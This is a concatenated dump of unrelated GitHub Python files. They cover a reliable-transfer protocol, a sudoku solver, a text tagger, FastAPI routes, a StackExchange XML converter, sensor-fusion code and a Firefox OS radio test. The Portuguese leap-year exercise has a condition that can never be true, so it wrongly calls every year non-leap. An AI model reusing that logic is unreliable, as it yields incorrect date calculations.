self.conn.sendto(ack_packet.to_bytes(), self.router_addr)\n\n # if not previously received, buffer it\n buffer_index = seq_num - self.recv_base\n if self.recv_buffer[buffer_index] is None:\n self.recv_buffer[buffer_index] = packet_recved.payload\n\n # slide window, and delivered buffered consecutive blocks\n if seq_num == self.recv_base:\n num_slide = self.num_consecutive_buffers(self.recv_buffer)\n print(\"Slide recv buffer window by \" + str(num_slide))\n\n # deliver to upper layer\n for i in range(num_slide):\n self.bytearray_to_be_delivered.extend(bytearray(self.recv_buffer[i]))\n\n # slide window\n for j in range(num_slide):\n self.recv_buffer.pop(0)\n self.recv_buffer.append(None)\n self.recv_base += 1\n\n elif self.recv_base-self.wsz <= seq_num <= self.recv_base-1:\n # return a selective ACK packet\n ack_packet = MyPacket(packet_type=PacketType.ACK,\n seq_num=seq_num,\n peer_ip_addr=self.peer_addr_of_receiver[0],\n peer_port=self.peer_addr_of_receiver[1],\n ack_num=seq_num,\n payload=\"\".encode('utf-8'))\n self.conn.sendto(ack_packet.to_bytes(), self.router_addr)\n\n\n def timer_monitor(self, end_seq_num):\n while self.send_base < end_seq_num:\n for i in range(self.wsz):\n timer = self.timers[i]\n if timer and (datetime.now() - timer).total_seconds() > self.timeout:\n # trigger timeout event\n seq_num = i + self.send_base\n packet = self.send_buffer[i]\n if packet and seq_num != packet.seq_num:\n print(\"Error, seq_num != packet.seq_num when timeout occurs\")\n else:\n print(\"Resend packet # \" + str(seq_num))\n try:\n self.conn.sendto(packet.to_bytes(), self.router_addr) # resend packet\n except Exception:\n pass\n self.timers[i] = datetime.now() # reset timer\n\n\n def ack_monitor_sender(self, end_seq_num):\n data, sender = None, None\n while self.send_base < end_seq_num:\n try:\n data, sender = self.conn.recvfrom(1024)\n except socket.timeout:\n pass\n if data is None or sender is None:\n continue\n\n # received ack, trigger ack_received event\n packet = MyPacket.from_bytes(data)\n ack_num = packet.ack_num\n\n if self.send_base <= ack_num < self.send_base + self.wsz:\n acks_index = ack_num - self.send_base\n self.acks[acks_index] = True\n self.timers[acks_index] = None\n\n # slide window to the unacknowledged packet with smallest seq num\n if ack_num == self.send_base:\n num_slided = self.num_consecutive_acks(self.acks)\n print(\"Slide send buffer window by \" + str(num_slided))\n\n # slide window\n for k in range(num_slided):\n self.send_buffer.pop(0)\n self.timers.pop(0)\n self.acks.pop(0)\n self.send_buffer.append(None)\n self.timers.append(None)\n self.acks.append(False)\n self.send_base += 1\n print(\"After sliding window, sendbase = \" + str(self.send_base))\n time.sleep(self.timeout)\n self.is_sending = False\n print(\"finish sending\")\n\n\n def is_full(self, array):\n return array.count(None) == 0\n\n\n def num_consecutive_buffers(self, array):\n n = self.wsz\n for i in range(self.wsz):\n if array[i] is None:\n n = i\n break\n return n\n\n def num_consecutive_acks(self, array):\n n = self.wsz\n for i in range(self.wsz):\n if array[i] is False:\n n = i\n break\n return n\n\n\n\n\n","repo_name":"fanzou2020/NetworkLabs","sub_path":"P3/rdt/rdt.py","file_name":"rdt.py","file_ext":"py","file_size_in_byte":16961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6366989219","text":"import numpy as np\r\nimport pandas as pd\r\n\r\nd = 9\r\nsd = int(d ** (1 / 2))\r\n\r\nall_possible_choices = [i + 1 for i in range(d)]\r\nrc = {}\r\nraw_sudoku_df = pd.read_excel(io='sudoku.xlsx',\r\n sheet_name=str(d) + \"x\" + str(d)\r\n )\r\n\r\n\r\nclass Soduko:\r\n def __init__(self):\r\n self.s = np.array([0 for i in range(d ** 2)]).reshape(d, sd, sd)\r\n self.x = []\r\n self.y = []\r\n self.z = []\r\n\r\n def imprt(self, rsd):\r\n for br in range(sd):\r\n for bc in range(sd):\r\n self.s[br * sd + bc] = np.array(rsd.iloc[br * sd: br * sd + sd,\r\n bc * sd: bc * sd + sd]\r\n )\r\n for i in range(0, d):\r\n self.x.append(list(np.array(rsd.iloc[i, :])))\r\n self.y.append(list(np.array(rsd.iloc[:, i])))\r\n self.z.append(list(np.hstack(self.s[i])))\r\n\r\n def copy(self, s):\r\n self.s = s.s[:]\r\n self.x = s.x[:]\r\n self.y = s.y[:]\r\n self.z = s.z[:]\r\n\r\nsudoku = Soduko()\r\nsudoku.imprt(raw_sudoku_df)\r\n\r\n\r\ndef disp_sudoku(s):\r\n ###Used to display \"sudoku\" in the process if anywhere needed\r\n for br in range(sd):\r\n for r in range(sd):\r\n for bc in range(sd):\r\n for c in range(sd):\r\n if (bc + 1) % sd == 0 and c + 1 == sd :\r\n print(s.s[(br * sd) + bc][r][c])\r\n elif c + 1 == sd:\r\n print(s.s[(br * sd) + bc][r][c], end=\"\\t|\\t\")\r\n else:\r\n print(s.s[(br * sd) + bc][r][c], end=\"\\t\\t\")\r\n if (bc + 1) % sd == 0 and c + 1 == sd and r + 1 == sd:\r\n print('')\r\n print('-------------------------------------------------------------------------')\r\n\r\ndef qrc(s):\r\n ###Creating a dictionary for each unsolved cell and then filling them with respective available choices and taking care of the unneccessary ones\r\n for i in range(d):\r\n for j in range(d):\r\n if s.x[i][j] == 0:\r\n if (i, j) not in rc.keys():\r\n rc[(i, j)] = all_possible_choices[:]\r\n\r\n for k in all_possible_choices:\r\n if k in rc[(i, j)]:\r\n if k in s.x[i] or k in s.y[j] or k in s.z[(i // sd) * sd + (j // sd)]:\r\n rc[(i, j)].remove(k)\r\n\r\n ###Remaining choices cleanup\r\n _tmp_rc = rc.copy()\r\n for k, v in _tmp_rc.items():\r\n if v == []:\r\n del rc[k]\r\n\r\n\r\ndef solve(s):\r\n ###Checks what cells requires \"handl\"ing and sends the corresponding command\r\n for br in range(sd):\r\n for bc in range(sd):\r\n for r in range(sd):\r\n for c in range(sd):\r\n if s.s[br * sd + bc][r][c] == 0:\r\n handle(s, br, bc, r, c)\r\n\r\ndef assignValue(s, br, bc, r, c, v):\r\n ###Assigns the proposed value in sudoku and all of its derivitives and takes care of the remaining_choices variable\r\n s.s[br * sd + bc][r][c] = v\r\n s.x[br * sd + r][bc * sd + c] = v\r\n s.y[bc * sd + c][br * sd + r] = v\r\n s.z[br * sd + bc][r * sd + c] = v\r\n del rc[(br * sd + r, bc * sd + c)]\r\n\r\ndef singleCandidate(s, br, bc, r, c):\r\n qrc(s)\r\n if (br * sd + r, bc * sd + c) in rc.keys():\r\n if len(rc[(br * sd + r, bc * sd + c)]) == 1:\r\n assignValue(s, br, bc, r, c, rc[(br * sd + r, bc * sd + c)][0])\r\n # else:\r\n # rc[(br * sub_dim + r, bc * sub_dim + c)] = possible_choices_for_the_current_cell\r\n\r\ndef onlyPossibleCell(s, br, bc, r, c):\r\n # print(list(rc.keys()).count((br * sub_dim + r, bc * sub_dim + c)))\r\n qrc(s)\r\n if list(rc.keys()).count((br * sd + r, bc * sd + c)) != 0:\r\n if len(rc[(br * sd + r, bc * sd + c)]) != 0:\r\n while True:\r\n a = set(rc[(br * sd + r, bc * sd + c)])\r\n ## Only Possible Cell in the block\r\n for i in range(sd):\r\n for j in range(sd):\r\n if (i, j) != (r, c):\r\n if list(rc.keys()).count((br * sd + i, bc * sd + j)) != 0:\r\n if len(rc[(br * sd + i, bc * sd + j)]) != 0:\r\n b = set(rc[(br * sd + i, bc * sd + j)])\r\n a = set(a).difference(b)\r\n if len(a) == 1:\r\n break\r\n\r\n # Only Possible Cell in the row\r\n for j in range(d):\r\n if j != bc * sd + c:\r\n if list(rc.keys()).count((br * sd + r, j)) != 0:\r\n if len(rc[(br * sd + r, j)]) != 0:\r\n b = set(rc[(br * sd + r, j)])\r\n a = set(a).difference(b)\r\n if len(a) == 1:\r\n break\r\n\r\n # Only Possible Cell in the col\r\n for i in range(d):\r\n if i != br * sd + r:\r\n if list(rc.keys()).count((i, bc * sd + c)) != 0:\r\n if len(rc[(i, bc * sd + c)]) != 0:\r\n b = set(rc[(i, bc * sd + c)])\r\n a = set(a).difference(b)\r\n if len(a) == 1:\r\n break\r\n\r\n break\r\n\r\n if len(a) == 1:\r\n assignValue(s, br, bc, r, c, list(a)[0])\r\n\r\n\r\ndef handle(s, br, bc, r, c):\r\n ###\"Handle\"s the given cell\r\n singleCandidate(s, br, bc, r, c)\r\n onlyPossibleCell(s, br, bc, r, c)\r\n\r\n\r\nfor i in range(1, d * 2):\r\n flat_sudoku = np.hstack(np.hstack(sudoku.s))\r\n if 0 in flat_sudoku:\r\n solve(sudoku)\r\n else:\r\n break\r\n\r\ndisp_sudoku(sudoku)\r\n","repo_name":"Pejhan/Sudoku","sub_path":"Sudoku1.0.py","file_name":"Sudoku1.0.py","file_ext":"py","file_size_in_byte":5853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74019826407","text":"# tagifai/predict.py\n# Prediction operations.\n\nfrom distutils.util import strtobool\nfrom typing import Dict, List\n\nimport numpy as np\nimport torch\n\nfrom tagifai import data, train\n\n\ndef predict(texts: List, artifacts: Dict, device: torch.device = torch.device(\"cpu\")) -> Dict:\n \"\"\"Predict tags for an input text using the\n best model from the `best` experiment.\n\n Usage:\n\n ```python\n texts = [\"Transfer learning with BERT.\"]\n artifacts = load_artifacts(run_id=\"264ac530b78c42608e5dea1086bc2c73\")\n predict(texts=texts, artifacts=artifacts)\n ```\n
        \n    [\n      {\n          \"input_text\": \"Transfer learning with BERT.\",\n          \"preprocessed_text\": \"transfer learning bert\",\n          \"predicted_tags\": [\n            \"attention\",\n            \"language-modeling\",\n            \"natural-language-processing\",\n            \"transfer-learning\",\n            \"transformers\"\n          ]\n      }\n    ]\n    
        \n\n Note:\n The input parameter `texts` can hold multiple input texts and so the resulting prediction dictionary will have `len(texts)` items.\n\n Args:\n texts (List): List of input texts to predict tags for.\n artifacts (Dict): Artifacts needed for inference.\n device (torch.device): Device to run model on. Defaults to CPU.\n\n Returns:\n Predicted tags for each of the input texts.\n\n \"\"\"\n # Retrieve artifacts\n params = artifacts[\"params\"]\n label_encoder = artifacts[\"label_encoder\"]\n tokenizer = artifacts[\"tokenizer\"]\n model = artifacts[\"model\"]\n\n # Prepare data\n preprocessed_texts = [\n data.preprocess(\n text,\n lower=bool(strtobool(str(params.lower))), # params.lower could be str/bool\n stem=bool(strtobool(str(params.stem))),\n )\n for text in texts\n ]\n X = np.array(tokenizer.texts_to_sequences(preprocessed_texts), dtype=\"object\")\n y_filler = np.zeros((len(X), len(label_encoder)))\n dataset = data.CNNTextDataset(X=X, y=y_filler, max_filter_size=int(params.max_filter_size))\n dataloader = dataset.create_dataloader(batch_size=int(params.batch_size))\n\n # Get predictions\n trainer = train.Trainer(model=model, device=device)\n _, y_prob = trainer.predict_step(dataloader)\n y_pred = [np.where(prob >= float(params.threshold), 1, 0) for prob in y_prob]\n tags = label_encoder.decode(y_pred)\n predictions = [\n {\n \"input_text\": texts[i],\n \"preprocessed_text\": preprocessed_texts[i],\n \"predicted_tags\": tags[i],\n }\n for i in range(len(tags))\n ]\n\n return predictions\n","repo_name":"GokuMohandas/follow","sub_path":"tagifai/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":2605,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"25529333345","text":"from fastapi import APIRouter, HTTPException\nfrom fastapi.responses import JSONResponse\nfrom app.models.recipients_list import RecipientsListModel as RecipientsList\nfrom app.models.newsletter_topics import NewsletterTopicsModel as Newsletter\nfrom app.services.recipients_list_service import RecipientsListService\n\nrecipients_router = APIRouter()\nrecipients_list_service = RecipientsListService()\n\n@recipients_router.get(\n \"/{admin_email}/recipients/\", \n response_model=RecipientsList, \n status_code=200, \n tags=[\"recipients_list\"])\ndef get_recipients_list(admin_email: str):\n service_response = recipients_list_service.get_recipients(admin_email)\n\n if service_response.get(\"error\", None):\n raise HTTPException(status_code=404, detail=service_response[\"error\"])\n \n return JSONResponse(status_code=200, content=service_response)\n\n@recipients_router.post(\n \"/{admin_email}/recipients/create-list/\", \n response_model=dict, \n status_code=200, \n tags=[\"recipients_list\"])\ndef create_recipients_list(admin_email: str, recipients_list: RecipientsList):\n service_response = recipients_list_service.create_new_recipients_list(admin_email, recipients_list)\n\n if service_response.get(\"error\", None):\n raise HTTPException(status_code=404, detail=service_response[\"error\"])\n \n return JSONResponse(status_code=201, content=service_response)\n\n@recipients_router.put(\n \"/{admin_email}/recipients/add-recipient/{new_recipient}\", \n response_model=dict, \n status_code=200, \n tags=[\"recipients_list\"])\ndef add_recipients(admin_email: str, new_recipient: str):\n service_response = recipients_list_service.add_new_recipient(admin_email, new_recipient)\n\n if service_response.get(\"error\", None):\n raise HTTPException(status_code=404, detail=service_response[\"error\"])\n \n return JSONResponse(status_code=201, content=service_response)\n\n@recipients_router.put(\n \"/{admin_email}/recipients/{recipient}/unsub/\", \n response_model=dict, \n status_code=200, \n tags=[\"recipients_list\"])\ndef add_recipient_unsub(admin_email: str, recipient: str, unsub_topics: Newsletter):\n topics_list = dict(unsub_topics)\n \n service_response = recipients_list_service.update_recipient_unsubs(\n admin_email, \n recipient, \n topics_list[\"topics\"].split(\",\")\n )\n\n if service_response.get(\"error\", None):\n raise HTTPException(status_code=404, detail=service_response[\"error\"])\n \n return JSONResponse(status_code=201, content=service_response)\n","repo_name":"david-oaxaca/newsletter-mvp","sub_path":"newsletter-api/app/routers/recipients_list_router.py","file_name":"recipients_list_router.py","file_ext":"py","file_size_in_byte":2606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70972074407","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nThis script processes stackoverflow dump obtained from stackexchange dump\nand produces a set of CSV files suitable for use with mysqlimport\n\nThe StackExchange data dump can be downloaded here:\n https://archive.org/details/stackexchange\n\n\n\"\"\"\n\nimport sys\nimport argparse\nimport csv\nimport xml.sax\nimport re\n\nPY3 = sys.version_info > (3,)\n\n\ndef iNone(attr):\n try:\n return int(attr)\n except (ValueError, TypeError) as e:\n return None\n\n\nclass DictWriter(object):\n # custom writer with utf8 conversion for Python 2\n init = False\n\n def _escape(self, value):\n return re.sub('([\\\\\\\\\"])', \"\\\\\\\\\\\\1\", value)\n\n def _convert(self, value):\n if isinstance(value, basestring):\n return '\"{}\"'.format(self._escape(value.encode('utf8')))\n elif value is None:\n return ''\n return str(value)\n\n def _convert3(self, value):\n if isinstance(value, bytes):\n return '\"{}\"'.format(self._escape(value.decode('utf8')))\n if isinstance(value, str):\n return '\"{}\"'.format(self._escape(value))\n elif value is None:\n return ''\n return str(value)\n\n def __init__(self, fh, fields):\n self.stream = fh\n self.fields = fields\n if PY3:\n self._convert = self._convert3\n\n def writerow(self, row):\n pass\n if not self.init:\n self.init = True\n else:\n self.stream.write(\"\\r\\n\")\n\n for i, field in enumerate(self.fields):\n self.stream.write(self._convert(row[field]))\n self.stream.write(\",\")\n\n\nclass SOHandler(xml.sax.ContentHandler):\n\n writer = None\n tags_fname = None\n tagwriter_fname = None\n tagwriter = None\n tags = None\n\n def row_handler(self): pass\n\n def __init__(self, tags_fname=None, tagwriter_fname=None):\n self.writer = csv.writer(sys.stdout)\n self.tags_fname = tags_fname or \"so_tag_names.csv\"\n self.tagwriter_fname = tagwriter_fname or \"tags.csv\"\n # this is an old-style class, so explicit __init__ instead of super()\n xml.sax.ContentHandler.__init__(self)\n\n def _post_tags(self, tagline):\n \"\"\" example of a tag line:\n \n \"\"\"\n return set([tag.lstrip(\"<\") for tag in tagline.split(\">\") if tag])\n\n def _parse_post(self, attrs):\n post_id = int(attrs['Id'])\n is_question = int(attrs.get('PostTypeId') == \"1\")\n if is_question:\n for tag in self._post_tags(attrs.get('Tags')):\n tag_id = self.tags[tag]\n self.tagwriter.writerow({\n 'post_id': post_id,\n 'tag_id': tag_id\n })\n return {\n 'id': post_id,\n 'question': is_question,\n 'title': attrs.get('Title'), # no title for answers\n 'body': attrs['Body'],\n 'owner_id': iNone(attrs.get('OwnerUserId')),\n 'accepted_answer': attrs.get('accepted_answer'),\n 'created_at': attrs['CreationDate'],\n 'score': int(attrs.get('Score', 0)),\n 'parent_id': iNone(attrs.get('ParentId')),\n 'views': int(attrs.get('ViewCount', 0)),\n 'last_editor_id': iNone(attrs.get('OwnerUserId')),\n 'last_edited_at': attrs.get('LastEditDate'),\n 'last_activity_at': attrs.get('LastEditDate'),\n 'community_owned_at': attrs.get('CommunityOwnedDate'),\n 'answers_count': int(attrs.get('AnswerCount', 0)),\n 'comments_count': int(attrs.get('CommentCount', 0)),\n 'favorites_count': int(attrs.get('FavoriteCount', 0)),\n }\n\n def _parse_user(self, attrs):\n return {\n 'id': int(attrs['Id']),\n 'name': attrs['DisplayName'],\n 'email_hash': None,\n 'reputation': int(attrs.get('Reputation'), 0),\n 'created_at': attrs['CreationDate'],\n 'website_url': attrs.get('WebsiteUrl'),\n 'location': attrs.get('Location'),\n 'age': iNone(attrs.get('Age')),\n 'views': int(attrs.get('Views', 0)),\n 'upvotes': int(attrs.get('UpVotes', 0)),\n 'downvotes': int(attrs.get('DownVotes', 0)),\n 'about_me': attrs.get('AboutMe')\n }\n\n def _parse_tag(self, attrs):\n return {\n 'id': int(attrs['Id']),\n 'name': attrs['TagName'],\n 'count': int(attrs.get('Count'), 0),\n 'excerpt_post_id': iNone(attrs.get('ExcerptPostId')),\n 'wiki_post_id': iNone(attrs.get('WikiPostId'))\n }\n\n def _parse_vote(self, attrs):\n return {\n 'id': int(attrs['Id']),\n 'post_id': attrs['PostId'],\n 'vote_type': int(attrs.get('VoteTypeId')),\n 'created_at': attrs['CreationDate']\n }\n\n def deferred_init(self, name):\n if name == 'posts':\n self.tags = {\n row[1]: int(row[0]) for row in csv.reader(\n open(self.tags_fname, 'r'))}\n columns = ['id', 'question', 'title', 'body', 'owner_id',\n 'accepted_answer', 'created_at', 'score', 'parent_id',\n 'views', 'last_editor_id', 'last_edited_at',\n 'last_activity_at', 'community_owned_at',\n 'answers_count', 'comments_count', 'favorites_count']\n self.row_handler = self._parse_post\n self.tagwriter = DictWriter(\n open(self.tagwriter_fname, 'w'), ['post_id', 'tag_id'])\n elif name == 'users':\n columns = ['id', 'name', 'email_hash', 'reputation', 'created_at',\n 'website_url', 'location', 'age', 'views', 'upvotes',\n 'downvotes', 'about_me']\n self.row_handler = self._parse_user\n elif name == 'tags':\n columns = ['id', 'name', 'count', 'excerpt_post_id', 'wiki_post_id']\n self.row_handler = self._parse_tag\n elif name == 'votes':\n columns = ['id', 'post_id', 'vote_type', 'created_at']\n self.row_handler = self._parse_vote\n else:\n raise ValueError('posts, users, tags or votes tag expected')\n\n self.writer = DictWriter(sys.stdout, columns)\n\n def startElement(self, name, attrs):\n if name in ('posts', 'tags', 'users', 'votes'):\n self.deferred_init(name)\n elif name == 'row': # ignore all other tags\n # if any(attrs.get(k) != v for k, v in self.filters.items()):\n # return\n self.writer.writerow(self.row_handler(attrs))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description=\"Transform stackexchange dump to csv format. The script \"\n \"accept XML file on standard input and prints CSV to \"\n \"the standard output\")\n args = parser.parse_args()\n\n parser = xml.sax.make_parser()\n parser.setContentHandler(SOHandler())\n parser.parse(sys.stdin)\n # parser.parse(open('Posts2200.xml', 'r')) # sys.stdin)\n","repo_name":"arunk054/ghd","sub_path":"so/so_import.py","file_name":"so_import.py","file_ext":"py","file_size_in_byte":7173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5238730596","text":"\"\"\"\nEXERCÍCIO 032: Ano Bissexto\n\nFaça um programa que leia um ano qualquer e mostre se ele é BISSEXTO.\n\"\"\"\nfrom datetime import date\nano = int(input('Digite um ano para conferir (Coloque 0 para analisar o ano atual): '))\n\nif ano == 0:\n ano = date.today().year\n\nbissexto = ano % 4 == 0 and ano % 100 != 0 and ano % 400 == 0\nif bissexto:\n print(f'O ano {ano} é BISSEXTO.')\nelse:\n print(f'O ano {ano} não é bissexto')\n","repo_name":"bruno-gs/Python","sub_path":"Curso em video/Fundamentos - M1/IF/IF... ELSE/ex032.py","file_name":"ex032.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3324956946","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Dec 1 08:20:34 2017\n\n@author: jungbt\n\"\"\"\nimport os\nimport sys\nimport hist_pipeline_gray as pip\nsys.path.append(os.getcwd()) \npipe = pip.Pipeline()\n#pipe.run()\npipe.input.histology.dir = '/data/NIMH_LBC_49ers/NIMH_macaque_brain/Subjects/gb8A/GB8A_Thionin/'\npipe.input.bf.dir = '/data/NIMH_LBC_49ers/NIMH_macaque_brain/Subjects/gb8A/GB8A_Blockface/blockface_volume/alignment_2/manual_tracing_output'\npipe.input.MRI.name = '/data/NIMH_LBC_49ers/NMT_D99_test/GB8A_to_NMT/GB8A_SS/GB8A_T1_SS_re.nii.gz'\npipe.input.root_dir = '/data/NIMH_LBC_49ers/NIMH_macaque_brain/Subjects/gb8A/pipeline_test_final_high3'\npipe.input.histology.pattern = 'GB8A_**.jpg'\npipe.input.bf.pattern = 'GB8A_**.jpg'\npipe.input.histology.orientation = 'SRP'\npipe.input.bf.orientation = 'SRP'\npipe.input.histology.pix_dim = [0.025,0.025,0.250]\npipe.input.bf.pix_dim = [0.03,0.03,0.250]\npipe.input.overwrite = False\npipe.input.threads = 181\npipe.input.reg_method = 'nonlinear'\npipe.input.resolution_level = 'MRI'\npipe.input.color = False\npipe.input.print_inputs()\npipe.run()","repo_name":"Bencephalon/NMB","sub_path":"nonlinear_bf_align.py","file_name":"nonlinear_bf_align.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4552683713","text":"# -*- coding: utf-8 -*-\nimport settings\nimport json\nimport httplib2\ntry:\n from conf.default import DEFAULT_BK_API_VER\nexcept:\n DEFAULT_BK_API_VER = 'v2'\n\nclass EsbClient:\n bk_token = ''\n\n def __init__(self, request):\n if request:\n self.bk_token = request.COOKIES.get(settings.BK_COOKIE_NAME, None)\n\n def call(self, module, action, param, version=''):\n if not version:\n version = DEFAULT_BK_API_VER\n http = httplib2.Http()\n if version == '' or version == 'v1':\n param['app_code'] = settings.APP_ID\n param['app_secret'] = settings.APP_TOKEN\n if self.bk_token:\n param['bk_token'] = self.bk_token\n else:\n param['username'] = settings.APP_ID\n elif version == 'v2':\n param['bk_app_code'] = settings.APP_ID\n param['bk_app_secret'] = settings.APP_TOKEN\n if self.bk_token:\n param['bk_token'] = self.bk_token\n else:\n param['bk_username'] = settings.APP_ID\n else:\n return {'result': False, 'message': u'接口版本号\"{0}\"不存在'.format(version), \"data\": None}\n headers = {'Content-type': 'application/json'}\n url = \"{0}/api/c/compapi/{1}/{2}/\".format(settings.BK_PAAS_HOST, module, action)\n response, content = http.request(url, 'POST', headers=headers, body=json.dumps(param))\n if response[\"status\"] == \"200\":\n return json.loads(content)\n else:\n return {\"data\": None, \"message\": u\"请求出现错误,错误状态:{0}\".format(response[\"status\"]), \"result\": False}\n\ndef get_esb_client(request=None):\n return EsbClient(request)\n","repo_name":"EthanJii/bk-exam","sub_path":"esb/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"71676576169","text":"import numpy as np\nfrom objectClasses import Obstacle\n\ndef initialize_fusion_objects(not_assigned_sensor_obj_list):\n \"\"\"\n :param not_assigned_sensor_obj_list: list of not assigned objects from the sensors\n :return: fusion_list_initialized_objects:\n \"\"\"\n sensor_specs = not_assigned_sensor_obj_list.sensor_specs\n time = not_assigned_sensor_obj_list.timeStamp\n new_fusion_elements = []\n \n for sensor_obj in not_assigned_sensor_obj_list:\n s_vector = sensor_obj.s_vector\n P = sensor_obj.P\n \n if not all(s_vector[:3] == s_vector[:3]): # some missing position measurements\n pos_initializers = sensor_specs['pos_initializers']\n pos_nans = np.where(np.isnan(s_vector[:3]))[0]\n for i in pos_nans:\n s_vector[:3][i] = np.random.normal(loc=pos_initializers[i],\n scale=pos_initializers[i] / 10.)\n P[i, :] = 0.\n P[:, i] = 0.\n P[i, i] = 1e18\n \n if not all(s_vector[3:6] == s_vector[3:6]): # some missing velocity measurements\n vel_initializers = sensor_specs['vel_initializers']\n vel_nans = np.where(np.isnan(s_vector[3:6]))[0]\n for i in vel_nans:\n s_vector[3:6][i] = np.random.normal(loc=vel_initializers[i],\n scale=vel_initializers[i] / 10.)\n P[3+i, :] = 0.\n P[:, 3+i] = 0.\n P[3+i, 3+i] = 1e18\n\n if not all(s_vector[6:9] == s_vector[6:9]): # some missing acc measurements\n acc_nans = np.where(np.isnan(s_vector[6:9]))[0]\n s_vector[6:9][acc_nans] = np.random.normal(size=(len(acc_nans)))\n for i in acc_nans:\n P[6+i, :] = 0.\n P[:, 6+i] = 0.\n P[6+i, 6+i] = 1e18\n new_fusion_elements.append(Obstacle(pos_x=s_vector[0], pos_y=s_vector[1],\n pos_z=s_vector[2], v_x=s_vector[3],\n v_y=s_vector[4], v_z=s_vector[5],\n a_x=s_vector[6], a_y=s_vector[7],\n a_z=s_vector[8],\n yaw=s_vector[9], r_yaw=s_vector[10], P=P,\n last_update_time=time, p_existence=1))\n return new_fusion_elements\n\n\ndef drop_objects(fusion_list, cluttered_matches, last_seen, distance_to_ego):\n \"\"\"\n :param fusion_list:\n :distance_to_ego: \n :last_seen\n :return:\n \"\"\"\n num_dropped = 0\n fusion_time = fusion_list.timeStamp\n # indices of false positive detections\n fp_detections = [i[1] for i in cluttered_matches]\n # indices of lost actors (because of long distance to ego / \n # last update time is long))\n lost_detections = []\n for idx, fusion_obj in enumerate(fusion_list):\n last_update = fusion_obj.last_update_time\n D = np.linalg.norm(fusion_obj.s_vector[:3])\n if fusion_time - last_update > last_seen or D > distance_to_ego: \n lost_detections.append(idx)\n num_dropped += 1\n \n print(\"Number of dropped actors (because of long distance to ego /\" \n \" last update time is long): %i\" %(num_dropped))\n idx_to_del = list(set(fp_detections + lost_detections))\n fusion_list = np.array(fusion_list)\n return list(np.delete(fusion_list, idx_to_del))\n return fusion_list","repo_name":"andro-demir/Sensor-Fusion-And-Target-Tracking-For-Autonomous-Vehicles","sub_path":"trackManagement.py","file_name":"trackManagement.py","file_ext":"py","file_size_in_byte":3528,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"26300061381","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this file,\n# You can obtain one at http://mozilla.org/MPL/2.0/.\n\nimport time\n\nfrom marionette_driver.wait import Wait\n\n\nclass FMRadioTestCommon(object):\n def __init__(self):\n # ensure radio is off on test startup\n if self.is_radio_enabled():\n self.turn_radio_off()\n\n def is_antenna_available(self):\n return self.marionette.execute_script(\"return window.navigator.mozFMRadio.antennaAvailable\")\n\n def user_connect_antenna(self):\n self.setup_antenna_change_listener()\n self.instruct(\"Insert the headset into the Firefox OS device, then click 'OK'\")\n self.wait_for_antenna_change()\n self.assertTrue(self.is_antenna_available(), \"Expected antenna/headset to be connected\")\n self.remove_antenna_change_listener()\n\n def user_detach_antenna(self):\n self.setup_antenna_change_listener()\n self.instruct(\"Remove the headset from the device, then click 'OK'\")\n self.wait_for_antenna_change()\n self.assertFalse(self.is_antenna_available(), \"Expected antenna/headset to be disconnected\")\n self.remove_antenna_change_listener()\n\n def is_radio_enabled(self):\n return self.marionette.execute_script(\"return window.navigator.mozFMRadio.enabled\")\n\n def setup_antenna_change_listener(self):\n # setup event handler for antenna insert/remove\n self.marionette.execute_async_script(\"\"\"\n var fm = window.navigator.mozFMRadio;\n window.wrappedJSObject.antenna_change = false;\n fm.onantennaavailablechange = function() {\n window.wrappedJSObject.antenna_change = true;\n };\n marionetteScriptFinished(1);\n \"\"\")\n\n def remove_antenna_change_listener(self):\n self.marionette.execute_script(\"window.navigator.mozFMRadio.onantennaavailablechange = null\")\n\n def wait_for_antenna_change(self):\n # wait for radio to change state\n wait = Wait(self.marionette, timeout=10, interval=0.5)\n try:\n wait.until(lambda x: x.execute_script(\"return window.wrappedJSObject.antenna_change\"))\n except:\n self.fail(\"Failed to receive mozFMRadio.onantennaavailablechange event\")\n\n def setup_radio_change_listeners(self):\n # setup event handlers for radio turning on/off\n self.marionette.execute_async_script(\"\"\"\n var fm = window.navigator.mozFMRadio;\n window.wrappedJSObject.rcvd_radio_on = false;\n fm.onenabled = function() {\n window.wrappedJSObject.rcvd_radio_on = true;\n };\n window.wrappedJSObject.rcvd_radio_off = false;\n fm.ondisabled = function() {\n window.wrappedJSObject.rcvd_radio_off = true;\n };\n marionetteScriptFinished(1);\n \"\"\")\n\n def remove_radio_change_listeners(self):\n self.marionette.execute_script(\"\"\"\n window.navigator.mozFMRadio.onenabled = null;\n window.navigator.mozFMRadio.ondisabled = null;\n \"\"\")\n\n def turn_radio_on(self):\n self.change_radio_state(turning_on=True)\n\n def turn_radio_off(self):\n self.change_radio_state(turning_on=False)\n\n def change_radio_state(self, turning_on):\n # turn on or off radio and verify request\n self.marionette.execute_async_script(\"\"\"\n var turning_on = arguments[0];\n var fm = window.navigator.mozFMRadio;\n window.wrappedJSObject.rcvd_success = false;\n window.wrappedJSObject.rcvd_error = false;\n // turn on or off accordingly\n if (turning_on) {\n var request = fm.enable(99.9);\n } else {\n var request = fm.disable();\n };\n // verify request\n request.onsuccess = function() {\n window.wrappedJSObject.rcvd_success = true;\n };\n request.onerror = function() 